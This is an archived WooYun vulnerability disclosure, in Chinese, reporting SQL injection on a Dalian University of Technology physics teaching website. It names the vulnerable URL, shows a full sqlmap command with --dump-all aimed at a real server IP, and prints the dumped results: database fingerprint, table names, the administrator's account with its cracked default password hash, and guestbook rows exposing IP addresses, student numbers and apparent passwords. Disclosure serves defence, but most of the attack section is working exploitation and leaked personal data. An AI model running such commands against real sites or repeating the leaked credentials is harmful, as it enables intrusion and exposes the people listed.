乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-19: 细节已通知厂商并且等待厂商处理中 2015-01-24: 厂商已经主动忽略漏洞,细节向公众公开
大连理工大学 物理教学中心 sql注入漏洞
http://phyedu.dlut.edu.cn/show.php?id=325
web application technology: PHP 4.4.4back-end DBMS operating system: Linux Debian 4.0 (etch)back-end DBMS: active fingerprint: MySQL >= 5.0.19 and < 5.0.38 comment injection fingerprint: MySQL 5.0.32 banner parsing fingerprint: MySQL 5.0.32, logging enabled html error message fingerprint: MySQLbanner: '5.0.32-Debian_7etch12-log'
sqlmap -u"http://202.118.65.46/knowledgeshow.php?id=4" -f --banner --dbs --users --tables --columns --dump-all可以获取数据库,表,字段
database management system users [1]:[*] 'jpkc6'@'%'available databases [2]:[*] information_schema[*] phyDatabase: phy[7 tables]+---------------------------------------+| admin || guestbook || labnews || link || mainnews || news || teacher |+---------------------------------------+
Database: phyTable: admin[1 entry]+----+------------------------------------------+-------+| id | pwd | name |+----+------------------------------------------+-------+| 1 | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin |+----+------------------------------------------+-------+Database: phyTable: guestbook[13 entries]+----+-----------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+| id | ip | user | content | dateline |+----+-----------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+| 2 | 202.118.73.211 | student | dllgdx001 | 2008-03-11 14:37:31 || 3 | 202.118.73.211 | student | ��~Z�~Y��~K~R�~U~H��~T�~Z~D��~D�~V~Y�~\��~S��~G~L��~_��~_��~_ | 2008-03-11 14:37:56 || 4 | 222.26.175.31 | 200749022 | 881206\r\n | 2009-03-01 15:42:45 || 5 | 222.26.201.3 | 200731084 | 1988117 | 2009-03-01 22:24:47 || 6 | 58.155.219.59 | 200873531 | 19631011
开发人员应该知道
危害等级:无影响厂商忽略
忽略时间:2015-01-24 17:30
暂无